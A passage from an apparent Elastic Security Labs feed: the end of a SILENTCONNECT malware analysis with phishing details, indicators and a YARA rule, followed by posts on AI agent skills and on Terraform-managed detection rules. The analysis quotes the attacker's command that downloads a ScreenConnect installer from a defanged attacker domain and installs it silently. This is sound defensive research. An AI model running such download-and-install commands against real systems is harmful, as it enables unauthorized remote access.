<img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image2.png" alt="SILENTCONNECT adding Microsoft Defender exception" title="SILENTCONNECT adding Microsoft Defender exception" /></p>
<p>After adding the exclusion, SILENTCONNECT creates a temporary directory (<code>C:\Temp</code>) and uses <code>curl.exe</code> to download the malicious ScreenConnect client installer into it. It then invokes <code>msiexec.exe</code> to silently install the RMM. Below is the second half of the command line:</p>
<pre><code>New-Item -ItemType Directory -Path 'C:\Temp' -Force | Out-Null; curl.exe -L 
 'hxxps://bumptobabeco[.]top/Bin/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest'
  -o 'C:\Temp\ScreenConnect.ClientSetup.msi'; Start-Process msiexec.exe '/i 
  C:\Temp\ScreenConnect.ClientSetup.msi'&quot;
</code></pre>
<p>Following installation, the ScreenConnect client persists as a Windows service and beacons to the adversary-controlled ScreenConnect server at <code>bumptobabeco[.]top</code> over TCP port <code>8041</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image16.png" alt="ScreenConnect Client outbound network activity" title="ScreenConnect Client outbound network activity" /></p>
<h2>SILENTCONNECT campaign</h2>
<p>The primary initial access vector for these campaigns is phishing email. We identified an email sample (<code>YOU ARE INVITED.eml</code>) uploaded to VirusTotal from a campaign last year.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image21.png" alt="Phishing email - Subject “YOU ARE INVITED”" title="Phishing email - Subject “YOU ARE INVITED”" /></p>
<p>The email is sent from <code>dan@checkfirst[.]net[.]au</code> and impersonates a project proposal invitation from a fake company. The email body invites the recipient to submit a proposal by clicking a link. This link redirects the victim to attacker-controlled infrastructure <code>imansport[.]ir/download_invitee.php</code>.</p>
<p>Notably, the threat actor reused the same URI path (<code>download_invitee.php</code>) across all compromised websites to deliver the payload. This consistent naming convention represents a poor operational security (OPSEC) practice, as it provided a reliable pivot point for tracking the campaign's infrastructure and identifying additional compromised hosts through VirusTotal searches such as <code>entity:url url:download_invitee.php</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image9.png" alt="Pivot example using same URI" title="Pivot example using same URI" /></p>
<p>We also uncovered various legitimate websites that were compromised and used the same infrastructure to facilitate other fraudulent schemes. For example, one URL (<code>solpru[.]com/process/docusign[.]html</code>) hosts a page that closely mimics the DocuSign electronic signature platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image3.png" alt="Fake DocuSign portal" title="Fake DocuSign portal" /></p>
<p>This chain skips SILENTCONNECT entirely, instead downloading a preconfigured ScreenConnect MSI that automatically connects to the actor’s server (<code>instance-lh1907-relay.screenconnect[.]com</code>).<br />
<img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image6.png" alt="ScreenConnect config from DocuSign scheme" title="ScreenConnect config from DocuSign scheme" /></p>
<p>Another page on a different domain impersonates a Microsoft Teams page and requests that the user download a file, which leads to abuse of the Syncro RMM Agent.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image7.png" alt="Fake Microsoft Teams landing page" title="Fake Microsoft Teams landing page" /></p>
<h2>Conclusion</h2>
<p>Elastic Security Labs continues to see an uptick in RMM adoption by threat actors. As these tools are used by legitimate IT departments, they are typically overlooked and considered “trusted” in most corporate environments. Organizations must stay vigilant, auditing their environments for unauthorized RMM usage.</p>
<p>While this particular group went a step further by writing a custom loader, the majority of their infection chain leverages Windows binaries to evade detection and blend in with normal system activity. The abuse of trusted platforms such as Google Drive and Cloudflare for payload hosting and lure delivery further complicates detection, as network-based controls are unlikely to block traffic to these services outright. As threat actors continue to favor simplicity and stealth over sophistication, campaigns of this nature are likely to persist and evolve.</p>
<h3>SILENTCONNECT and MITRE ATT&amp;CK</h3>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h4>Tactics</h4>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0011">Command and Control</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0004/">Privilege Escalation</a></li>
</ul>
<h4>Techniques</h4>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1562/001/">Impair Defenses: Disable or Modify Tools</a></li>
<li><a href="https://attack.mitre.org/techniques/T1548/002/">Abuse Elevation Control Mechanism: Bypass User Account Control</a></li>
<li><a href="https://attack.mitre.org/techniques/T1219/002/">Remote Access Tools: Remote Desktop Software</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
</ul>
<h2>Detecting SILENTCONNECT</h2>
<ul>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_ingress_exe_transfer_via_curl.toml">Ingress Tool Transfer via CURL</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_webservice_lolbas.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml">UAC Bypass via ICMLuaUtil Elevated COM Interface</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/execution_suspicious_powershell_cmdline.toml">Suspicious PowerShell Execution</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_wmi.toml">Windows Defender Exclusions via WMI</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_windows_powershell_susp_args.toml">Suspicious Windows Powershell Arguments</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_common_webservices.toml">Connection to Commonly Abused Web Services</a></li>
</ul>
<h4>YARA</h4>
<p>Elastic Security has created the following YARA rules to identify this activity:</p>
<pre><code>rule Windows_Trojan_SilentConnect_cdc03e84 {
    meta:
        author = &quot;Elastic Security&quot;
        creation_date = &quot;2026-03-04&quot;
        last_modified = &quot;2026-03-04&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        threat_name = &quot;Windows.Trojan.SilentConnect&quot;
        reference_sample = &quot;8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db&quot;
        license = &quot;Elastic License v2&quot;
    strings:
        $peb_evade = &quot;winhlp32.exe&quot; wide fullword
        $rev_elevation = &quot;wen!rotartsinimdA:noitavelE&quot; wide fullword
        $masquerade_peb_str = &quot;MasqueradePEB&quot; ascii fullword
        $guid = &quot;3E5FC7F9-9A51-4367-9063-A120244FBEC7&quot; wide fullword
        $unique_str = &quot;PebFucker&quot; ascii fullword
        $peb_shellcode = { 53 48 31 DB 48 31 C0 65 48 8B 1C 25 60 00 00 00 }
        $rev_screenconnect = &quot;tcennoCneercS&quot; ascii wide
    condition:
        5 of them
}
</code></pre>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3</code></td>
<td align="left">SHA-256</td>
<td align="left">E-INVITE.vbs</td>
<td align="left">VBScript</td>
</tr>
<tr>
<td align="left"><code>adc1cf894cd35a7d7176ac5dab005bea55516bc9998d0c96223b6c0004723c37</code></td>
<td align="left">SHA-256</td>
<td align="left">2025Trans.vbs</td>
<td align="left">VBScript</td>
</tr>
<tr>
<td align="left"><code>81956d08c8efd2f0e29fd3962bcf9559c73b1591081f14a6297e226958c30d03</code></td>
<td align="left">SHA-256</td>
<td align="left">FileR.txt</td>
<td align="left">C#</td>
</tr>
<tr>
<td align="left"><code>c3d4361939d3f6cf2fe798fef68d4713141c48dce7dd29d3838a5d0c66aa29c7</code></td>
<td align="left">SHA-256</td>
<td align="left">ScreenConnect.ClientSetup.msi</td>
<td align="left">SCREENCONNECT Installer</td>
</tr>
<tr>
<td align="left"><code>8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db</code></td>
<td align="left">SHA-256</td>
<td align="left"></td>
<td align="left">SILENTCONNECT</td>
</tr>
<tr>
<td align="left"><code>86.38.225[.]59</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">ScreenConnect C2 Server</td>
</tr>
<tr>
<td align="left"><code>bumptobabeco[.]top</code></td>
<td align="left">domain</td>
<td align="left"></td>
<td align="left">ScreenConnect C2 Server</td>
</tr>
<tr>
<td align="left"><code>instance-lh1907-relay.screenconnect[.]com</code></td>
<td align="left">domain</td>
<td align="left"></td>
<td align="left">ScreenConnect C2 Server</td>
</tr>
<tr>
<td align="left"><code>349e78de0fe66d1616890e835ede0d18580abe8830c549973d7df8a2a7ffdcec</code></td>
<td align="left">SHA-256</td>
<td align="left">ViewDocs.exe</td>
<td align="left">Syncro Installer</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/silentconnect-delivers-screenconnect.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to enable real data sources before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints, while skills encode workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Managing Elastic Security Detection Rules with Terraform]]></title>
            <link>https://www.elastic.co/security-labs/managing-rules-with-terraform</link>
            <guid>managing-rules-with-terraform</guid>
            <pubDate>Fri, 13 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn to define and deploy Elastic Security detection rules and exceptions using the Elastic Stack Terraform Provider vs detection-rules repository DaC capabilities.]]></description>
            <content:encoded><![CDATA[<p>At the core of Elastic Security lie <a href="https://www.elastic.co/blog/elastic-security-detection-engineering">outstanding detection capabilities</a>, allowing users to <a href="https://www.elastic.co/blog/elastic-security-building-effective-threat-hunting-detection-rules">create</a>, test, tune, manage, deploy detection rules, as code, in their environments. The ability to create robust detections is critical for Security Operations as detection logic elevates threat signal from the telemetry noise.</p>
<p>This article highlights how Elastic's new Terraform resources for security detection rules and exceptions expand practitioners' capabilities for detection-as-code deployment. Below you will find examples of defining and deploying your detection artifacts in Elastic Security with Terraform. We will also show how you can use Elastic's AI Agent to quickly create the Terraform configuration for your custom rules. Finally, we provide guidance on when to use the Elastic Stack Terraform <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">provider</a> versus <a href="https://github.com/elastic/detection-rules/blob/main/README.md#detections-as-code-dac">tools from the detection-rules repository</a>.</p>
<h2>Managing Elastic with Terraform</h2>
<p><a href="https://developer.hashicorp.com/terraform">Terraform</a> is a tool created by HashiCorp (now IBM) to manage infrastructure in the cloud, or in self-managed environments, as code. With a few strokes of HCL (HashiCorp Configuration Language), users can define the desired state of their cloud provider infrastructure, applications, and configuration, and, in Elastic’s case, cluster settings, indices or streams, and now also detection rules and exceptions, as fully configurable, traceable, and reviewable code in your favorite source management tool.</p>
<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a> helps search, observability, and security professionals, as well as DevOps engineers and SREs, configure their Elastic clusters with the right indices and mappings for their search use cases, SLOs or Fleet policies for their observability use cases, and now detection rules and exceptions for their security use case. It can configure these and many more objects and settings in the Elastic Stack.</p>
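<p>If you're not already managing Elastic with Terraform, a minimal provider configuration looks something like the sketch below. The endpoint and credential values are placeholders, and the <code>kibana</code> block attributes should be verified against the provider's registry documentation for your version:</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;&gt;= 0.13.0&quot;
    }
  }
}

# Placeholder endpoint and API key: substitute your own deployment details.
provider &quot;elasticstack&quot; {
  kibana {
    endpoints = [&quot;https://my-deployment.kb.us-east-1.aws.elastic.cloud&quot;]
    api_key   = var.kibana_api_key
  }
}
</code></pre>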
<h2>Security Detection rules - now as code with Terraform</h2>
<p>With <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">v0.12.0</a> and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">v0.13.0</a> of the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a>, users can now manage their detection rules and rule exceptions using Terraform. This is especially useful for users who already manage their Elastic deployments with Terraform and want to extend that to detection rules.</p>
<h3>Using the Elastic Stack Terraform Provider to deploy Rules and Exceptions</h3>
<p>Let's look at an example of using the Elastic Stack Terraform Provider to deploy an Elastic Security Rule. In this example, we want to detect Windows Service Accounts that are performing an interactive logon on a host.</p>
<p>Service accounts typically have elevated privileges and rarely-rotated passwords, making them high-value targets for attackers. Since these accounts should only perform automated service logons, an interactive logon can indicate credential theft or misuse.</p>
<p>The first thing we need to think of is what telemetry we need to see which logons are happening on our host. <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624">Logon events</a> are logged by the Windows Local Security Authority Subsystem Service (LSASS) whenever a logon session is successfully created on the machine. We can pick this up via an Elastic Agent with the <a href="https://www.elastic.co/docs/reference/integrations/windows">Windows Integration</a> installed.</p>
<p>The Elastic Agent writes this data into the <code>system.security</code> data stream, which we can match with the index pattern <code>logs-system.security-*</code>. We also know that logon events generate event code <code>4624</code> and that, in our example, the service account name starts with <code>svc</code> or ends with <code>$</code>. In addition, an interactive login will have a logon type of <code>interactive</code>.</p>
<p>So, we can match these events with an <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> rule like:</p>
<pre><code class="language-sql">FROM logs-system.security-*
| WHERE event.code == &quot;4624&quot; AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot;
     OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
     AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;,
         &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
</code></pre>
<p>There may be situations where we don't want this rule to fire, for example, if there is a legacy application that we want to permit interactive logons from. So, we can create an <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/rule-exceptions">Exception Item</a>, like: <code>user.name IS svc_sqlbackup</code>.</p>
<p>Now that we know what we want the Rule and its Exceptions to look like, we can use the Terraform provider's <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">elasticstack_kibana_security_detection_rule</a>, <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_list">elasticstack_kibana_security_exception_list</a>, and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_item">elasticstack_kibana_security_exception_item</a> resources to define them in code.</p>
<p>Turning ES|QL rules into Terraform's configuration syntax, <a href="https://developer.hashicorp.com/terraform/language/syntax/configuration">HCL</a>, is a great use case for Elastic's <a href="https://www.elastic.co/docs/solutions/security/ai/agent-builder/agent-builder">AI Agent</a>.<br />
Elastic AI Agent capabilities help accelerate security operations across a wide range of tasks, from <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">alert triage and incident response</a> to detection lifecycle work.</p>
<p>Simply open AI Agent, and ask it to create Terraform configurations based on your query and exceptions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image2.png" alt="" /></p>
<p>You should end up with something like this:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image1.png" alt="" /></p>
<p>Here's a closer look at the code.</p>
<p>There are a few elements to call out specifically:</p>
<ul>
<li><code>type</code>: The type of exception list. For example: detection, endpoint, or endpoint_trusted_apps</li>
<li><code>namespace_type</code>: Determines whether the exception list is available in all Kibana spaces or just the single space in which it was created.</li>
</ul>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;svc_account_interactive_login&quot; {
  list_id        = &quot;svc-account-interactive-login-exceptions&quot;
  name           = &quot;Service Account Interactive Login Exceptions&quot;
  description    = &quot;Documented exceptions for service accounts that legitimately require interactive logon&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;service-accounts&quot;,&quot;windows&quot;,&quot;authentication&quot;]
}  
</code></pre>
<p>This creates a new exception list.</p>
<p>Of note, the <code>entries</code> array contains the conditions under which the exception applies.</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;svc_sqlbackup&quot; {
  list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
  item_id        = &quot;svc-sqlbackup-exception&quot;
  name           = &quot;svc_sqlbackup - Legacy SQL Backup Agent&quot;
  description    = &quot;Approved exception: Legacy SQL backup agent requires interactive logon per vendor documentation.&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;sql&quot;,&quot;backup&quot;,&quot;approved&quot;]
entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = &quot;svc_sqlbackup&quot;
    }
  ]
} 
</code></pre>
<p>This adds our exception: we don't want the rule to alert when the username is <code>svc_sqlbackup</code>.</p>
<p>Of note, the elements from <code>enabled</code> to the <code>technique</code> array are examples of the other properties that can be set on a rule.</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;svc_account_interactive_login&quot; {
  name        = &quot;Service Account Interactive Login&quot;
  description = &lt;&lt;-EOT
    Detects interactive logins by service accounts. Service accounts should authenticate
    via service (Type 5) or batch (Type 4) logon types, not interactively. Interactive
    logins by service accounts may indicate credential theft or misuse.

    This rule identifies service accounts by common naming conventions (svc_*, svc-*,
    *_svc) and managed service accounts (*$).
  EOT

  type     = &quot;esql&quot;
  language = &quot;esql&quot;
  query    = &lt;&lt;-EOT
    FROM logs-system.security-* metadata _id, _version, _index
    | WHERE event.code == &quot;4624&quot;
      AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot; OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
      AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;, &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
    | KEEP @timestamp, host.name, user.name, user.domain, winlog.logon.type, source.ip, _id, _version, _index
  EOT

  enabled    = true 
  severity   = &quot;high&quot;
  risk_score = 73

  from     = &quot;now-6m&quot;
  to       = &quot;now&quot;
  interval = &quot;5m&quot;

  author  = [&quot;Security Team&quot;]
  license = &quot;Elastic License v2&quot;
  tags    = [
    &quot;Domain: Endpoint&quot;,
    &quot;OS: Windows&quot;,
    &quot;Use Case: Identity and Access Audit&quot;,
    &quot;Tactic: Initial Access&quot;,
    &quot;Data Source: Windows Security Event Log&quot;
  ]

  false_positives = [
    &quot;Service accounts with documented exceptions that require interactive logon&quot;,
    &quot;Break-glass procedures during incident response&quot;,
    &quot;Initial service account configuration or troubleshooting&quot;
  ]

  references = [
    &quot;https://learn.microsoft.com/en-us/entra/architecture/service-accounts-on-premises&quot;,
    &quot;https://blog.quest.com/10-microsoft-service-account-best-practices/&quot;,
    &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
  ]

  threat = [
    {
      framework = &quot;MITRE ATT&amp;CK&quot;
      tactic = {
        id        = &quot;TA0001&quot;
        name      = &quot;Initial Access&quot;
        reference = &quot;https://attack.mitre.org/tactics/TA0001/&quot;
      }
      technique = [
        {
          id        = &quot;T1078&quot;
          name      = &quot;Valid Accounts&quot;
          reference = &quot;https://attack.mitre.org/techniques/T1078/&quot;
          subtechnique = [
            {
              id        = &quot;T1078.002&quot;
              name      = &quot;Domain Accounts&quot;
              reference = &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
            }
          ]
        }
      ]
    }
  ]

  exceptions_list = [
    {
      id             = elasticstack_kibana_security_exception_list.svc_account_interactive_login.id
      list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
      namespace_type = elasticstack_kibana_security_exception_list.svc_account_interactive_login.namespace_type
      type           = elasticstack_kibana_security_exception_list.svc_account_interactive_login.type
    }
  ]
}
</code></pre>
<p>Finally, we define the rule, including the ES|QL query we provided earlier and MITRE ATT&amp;CK classification.</p>
<p>You can add these resource definitions to a single configuration file (perhaps <code>security-rules.tf</code>), place it in your <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs#kibana">configured</a> Elastic Stack Terraform directory, and then run <code>terraform apply</code> to deploy the Rule:</p>
<pre><code class="language-shell">terraform apply -auto-approve
</code></pre>
<p>Since <code>terraform apply</code> runs a plan before making changes, it will automatically detect if anyone has edited a rule directly in Kibana and show you exactly what drifted: no manual exports or diffs needed.</p>
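<p>In CI, this drift check can be automated. A minimal sketch using the documented <code>-detailed-exitcode</code> flag of <code>terraform plan</code>:</p>
<pre><code class="language-shell"># terraform plan -detailed-exitcode returns:
#   0 = no changes, 1 = error, 2 = changes pending (drift or new config)
terraform plan -detailed-exitcode -no-color
status=$?
if [ &quot;$status&quot; -eq 2 ]; then
  echo &quot;Drift detected: configuration changed outside Terraform&quot;
fi
</code></pre>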
<p>After Terraform has made the changes, we can see the Rule in Kibana:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image5.png" alt="" /></p>
<p>We can also see the Exception List:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image4.png" alt="" /></p>
<p>This way, you can define your detections in Terraform and benefit from automatic deployment along with other objects you manage with Terraform.</p>
<h2>Terraform workspaces for multi-space Elastic deployments</h2>
<p>Terraform uses a concept called “<a href="https://developer.hashicorp.com/terraform/language/state/workspaces">workspaces</a>,” which lets you reuse the same infrastructure code for multiple deployments, for example, dev, testing, and production environments. This concept is useful for managing rules across multiple deployments and/or Kibana spaces.</p>
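<p>For example, the active workspace name is exposed as <code>terraform.workspace</code> and can drive per-environment rule settings. A minimal sketch (the per-environment policy shown here is illustrative):</p>
<pre><code># Derive per-environment settings from the active workspace.
locals {
  is_prod = terraform.workspace == &quot;prod&quot;

  # Illustrative policy: rules deploy disabled and low-severity outside prod.
  rule_enabled  = local.is_prod
  rule_severity = local.is_prod ? &quot;high&quot; : &quot;low&quot;
}
</code></pre>
<p>The rule resource can then reference <code>enabled = local.rule_enabled</code> and <code>severity = local.rule_severity</code>, so that <code>terraform workspace select prod</code> followed by <code>terraform apply</code> deploys the same code with production settings.</p>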
<h2>Managing detections with Terraform and Detections as code</h2>
<p>Elastic also has <a href="https://www.elastic.co/security-labs/detection-as-code-timeline-and-new-features">Detections as Code functionality</a> available via our open <a href="https://github.com/elastic/detection-rules">detection-rules repository</a>.</p>
<p>The two tools have complementary strengths and are aligned with different user profiles and workflow stages for implementing Detections as Code.</p>
<h3>Detection as Code features in detection-rules</h3>
<ul>
